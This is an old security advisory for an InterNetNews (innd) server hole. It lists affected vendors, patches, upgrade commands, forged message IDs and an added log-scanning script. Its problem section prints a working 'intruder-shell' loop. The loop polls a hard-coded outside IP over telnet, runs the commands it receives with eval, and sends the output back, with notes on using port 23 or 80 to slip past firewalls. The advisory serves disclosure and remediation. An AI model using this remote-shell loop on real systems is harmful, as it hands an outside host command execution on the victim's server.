COMMAND
InterNetNews server (innd)
SYSTEMS AFFECTED
Systems running InterNetNews server, up to and including v1.5.
Systems using any of the listed vendors may be vulnerable.
Berkeley Software Design, Inc. (BSDI)
Caldera
Debian Linux
NEC Corporation
Netscape
Red Hat
NOTE: 1.5.1 could be vulnerable - see solutions
PROBLEM
Rikhardur Egilsson posted the "intruder-shell" program.
The "intruder-shell" is the following /bin/sh program:
while :; do
    IN=`/bin/sleep 2 | /bin/telnet 193.12.106.100 23 2>/dev/null | /bin/tail -1`
    if [ X"$IN" != X"$OIN" ]; then
        (/bin/sleep 2; eval "$IN" 2>&1) |
        /bin/telnet 193.12.106.100 23 >/dev/null 2>&1
        OIN=$IN
    fi
    sleep 30
done
No explanation is given here (see the pseudocode below to understand
the program above), but be aware of the IP address you use.
repeat(forever)
    wait 2 seconds;
    connect to port 23 on 193.12.106.100;
    put the last line of what '193.12.106.100' gives us in variable $IN
    if $IN does not equal $OIN (Old IN)
        wait 2 seconds;
        evaluate $IN as a command and send the results to '193.12.106.100'
        (e.g. $IN could be '/bin/ls -l /etc')
        assign the value of $IN to $OIN
    end // if
    wait 30 seconds
end // repeat
Port 23 is by no means a randomly chosen port. It is chosen
because, even if most ports to/from a site are blocked by a
router/firewall, port 23 is very often allowed to connect to the
outside world. Port 23 is the 'telnet' port, i.e. if a domain
allows telnet connections out from its news server we're in
luck! Note that port 80 is also a good idea.
SOLUTION
Upgrade to INN 1.5.1. Until you can do so, install the patches
available from James Brister or get help from your vendor, if it
is available.
If you do a 'make update' from a previous innd (e.g. innd1.4unoff4)
to upgrade to 1.5.1, you will still have your old parsecontrol
script. The exploit will still work. The temporary fix is to
copy over the new parsecontrol. The real fix is a new install of
1.5.1 with the conf files, libs, etc. pushed on top.
Examine your news logs for signs of exploitation. So far, we have
reports of at least six distinct message IDs being used:
830201540.9120@uunet.uu.net
830201540.9122@uunet.uu.net
830201540.9220@uunet.uu.net
830201540.9223@uunet.uu.net
830201540.9020@uunet.uu.net
830201540.9221@uunet.uu.net
Although these messages appear to come from UUNET, the messages
were forged.
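One way to run that check, as an added example that is not part of the original advisory: the script below searches the log files given as arguments for the six message IDs listed above. The log file paths and the layout of the sample log lines are assumptions, and the sample lines are constructed.

```shell
#!/bin/sh
# Added example (not from the advisory): find the forged message IDs in INN logs.

# Message IDs copied from the list in this advisory.
IOC_IDS='830201540.9120@uunet.uu.net 830201540.9122@uunet.uu.net
830201540.9220@uunet.uu.net 830201540.9223@uunet.uu.net
830201540.9020@uunet.uu.net 830201540.9221@uunet.uu.net'

# scan_inn_logs FILE...
# Prints "<hits> <message-id> <file>" for each ID present in a readable file.
# Returns 1 if any ID was seen, 2 if no file could be read, else 0.
scan_inn_logs() {
    seen=0 readable=0
    for f in "$@"; do
        if [ ! -r "$f" ]; then
            echo "skip: cannot read $f" >&2
            continue
        fi
        readable=1
        for id in $IOC_IDS; do
            # -F matches the ID literally ('.' is not a wildcard); -c counts lines.
            n=$(grep -cF -- "$id" "$f" || true)
            if [ "${n:-0}" -gt 0 ]; then
                echo "$n $id $f"
                seen=1
            fi
        done
    done
    [ "$readable" -eq 1 ] || return 2
    return "$seen"
}

# Constructed sample lines (assumed layout: time, status, feed, <message-id>).
sample_log() {
    cat <<'EOF'
Mar 18 02:11:07.120 + feed.example.net <830201540.9120@uunet.uu.net> peer1
Mar 18 02:11:09.431 + feed.example.net <ordinary.1234@news.example.org> peer1
Mar 18 02:14:55.002 - feed.example.net <830201540.9120@uunet.uu.net> 437 Duplicate
Mar 18 03:40:12.870 + feed.example.net <830201540.9221@uunet.uu.net> peer1
EOF
}

# With arguments, scan those logs; without, run on the constructed sample.
if [ "$#" -gt 0 ]; then
    scan_inn_logs "$@" || :
else
    tmp=$(mktemp) && sample_log >"$tmp" && { scan_inn_logs "$tmp" || :; }
    rm -f "$tmp"
fi
```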
Running 1.5.1 is recommended, but if you're running a pre-1.5.1
version of INN, then please look at the web page:
http://www.isc.org/inn.html
or the ftp site
ftp://ftp.isc.org/isc/inn/patches
for patches to 1.4sec, 1.4unoff3, 1.4unoff4 and 1.5 to correct
this.
If you upgraded previously, you must apply the new patch to protect
against the new vulnerability (see innd #4 on this page). Until
you can upgrade, you need to apply two patches (see below). You
If you do not upgrade to 1.5.1, apply a patch for the version you
are running and then apply the newly released patch that
addresses the second vulnerability discussed in this advisory. If
you are running INN 1.4sec2, you should upgrade to 1.5.1 as no
patches are available.
FIRST apply:
version                 patch
-------                 -----
1.5                     ftp://ftp.isc.org/isc/inn/patches/security-patch.01
1.4sec                  ftp://ftp.isc.org/isc/inn/patches/security-patch.02
1.4unoff3, 1.4unoff4    ftp://ftp.isc.org/isc/inn/patches/security-patch.03
THEN apply (1.5.1, 1.5, 1.4sec, 1.4unoff3, 1.4unoff4):
ftp://ftp.isc.org:/isc/inn/patches/security-patch.04
Some additional patches:
Berkeley Software Design, Inc. (BSDI)
BSDI ship INN as part of our distribution. BSD/OS 2.1 includes INN
1.4sec and 2.1 users should apply the patch referenced here.
BSD/OS 3.0 includes INN 1.4unoff4 and the patch for that version
is already included so BSD/OS 3.0 is not vulnerable as
distributed.
An upgrade package for Caldera OpenLinux Base 1.0 will appear at
Caldera's site:
ftp://ftp.caldera.com/pub/col-1.0/updates/Helsinki/004/inn-1.5.1-2.i386.rpm
The current version of INN shipped with Debian is 1.4unoff4.
However the "unstable" (or development) tree contains inn-1.5.1.
It can be gotten from any debian mirror in the subdirectory
debian/unstable/binary/news
There is a critical security hole in INN which affects all
versions of Red Hat Linux. A new version, inn-1.5.1-6, is now
available for Red Hat Linux 4.0 and 4.1 for all platforms. If you
are running an earlier version of Red Hat, we strongly encourage
you to upgrade to 4.1 as soon as possible, as many critical
security fixes have been made. The new version of inn is PGP
signed with the Red Hat PGP key, which is available on all Red
Hat CDROMs, ftp.redhat.com, and public keyservers.
You may upgrade to the new version as follows:
Red Hat 4.1
-----------
i386:
rpm -Uvh ftp://ftp.redhat.com/updates/4.1/i386/inn-1.5.1-6.i386.rpm
alpha:
rpm -Uvh ftp://ftp.redhat.com/updates/4.1/alpha/inn-1.5.1-6.alpha.rpm
SPARC:
rpm -Uvh ftp://ftp.redhat.com/updates/4.1/sparc/inn-1.5.1-6.sparc.rpm
Red Hat 4.0
-----------
i386:
rpm -Uvh ftp://ftp.redhat.com/updates/4.0/i386/inn-1.5.1-6.i386.rpm
alpha:
rpm -Uvh ftp://ftp.redhat.com/updates/4.0/alpha/inn-1.5.1-6.alpha.rpm
SPARC:
rpm -Uvh ftp://ftp.redhat.com/updates/4.0/sparc/inn-1.5.1-6.sparc.rpm
NEC Corporation
Products below are shipped with INN mentioned here, so they are
vulnerable and patches are in progress.
Goah/NetworkSV R1.2 vulnerable
Goah/NetworkSV R2.2 vulnerable
Goah/NetworkSV R3.1 vulnerable
Goah/IntraSV R1.1 vulnerable
Netscape
The Netscape News Server 2.01 is immune to the attack outlined
here. The News Server 1.1 is, however, subject to the same
vulnerability as INN and Netscape has advised customers to
install the patch described in the CERT advisory (this one).
After installing any of the patches or updates, ensure that you
restart your INN server.